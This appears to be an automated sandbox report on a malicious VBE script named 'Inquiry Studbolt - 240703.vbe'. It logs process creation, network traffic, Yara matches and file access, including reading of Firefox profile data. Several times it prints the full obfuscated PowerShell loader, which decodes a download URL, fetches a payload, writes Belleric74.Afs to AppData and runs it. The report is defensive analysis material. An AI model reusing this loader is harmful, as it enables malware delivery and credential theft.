Source: powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester4
Source: powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000009.00000002.882848532717.000002165B32B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165B300000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pesterh
Source: powershell.exe, 00000009.00000002.882848532717.000002165C0DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000009.00000002.882848532717.000002165B480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882926973942.0000021669E6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878910754934.0000000005737000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878910754934.0000000005874000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000009.00000002.882848532717.000002165B100000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000009.00000002.882848532717.000002165A2CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845630299.0000000005134000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000009.00000002.882848532717.000002165A2CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845630299.0000000005134000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000009.00000002.882848532717.000002165A2CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845630299.0000000005134000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000009.00000002.882848532717.000002165A2CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845630299.0000000005134000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000009.00000002.882848532717.000002165A2CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845630299.0000000005134000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949

Source: unknown	HTTPS traffic detected: 142.250.191.110:443 -> 192.168.11.30:49949 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.2.33:443 -> 192.168.11.30:49950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.191.110:443 -> 192.168.11.30:49951 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.2.33:443 -> 192.168.11.30:49952 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_6840.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2680, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6840, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 5088
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 5088
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 5088	Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,

Detected potential crypto function

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_046B85F0	13_2_046B85F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_046B8EC0	13_2_046B8EC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_046B82A8	13_2_046B82A8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_22C93960	15_2_22C93960
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_22C94978	15_2_22C94978
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_22C9961E	15_2_22C9961E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_22C9C850	15_2_22C9C850
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_22C93CA8	15_2_22C93CA8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_232CAD28	15_2_232CAD28
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_232C8B18	15_2_232C8B18
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_232C7BB1	15_2_232C7BB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_232C0040	15_2_232C0040
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_232C3C00	15_2_232C3C00
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Code function: 16_2_007E1C5C	16_2_007E1C5C
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Code function: 16_2_007E25D3	16_2_007E25D3

Yara signature match

Source: amsi32_6840.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2680, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6840, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBE@14/8@3/3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Belleric74.Afs

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3436:120:WilError_03
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3436:304:WilStaging_02

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xmx2r0kx.r2f.ps1

Jump to behavior

Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Command line argument: WABOpen		16_2_007E1C5C
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Command line argument: 5~		16_2_007E3530

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2680
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6840
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Inquiry Studbolt - 240703.vbe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belleric74.Afs && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belleric74.Afs && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe "C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe "C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belleric74.Afs && echo t"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belleric74.Afs && echo t"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
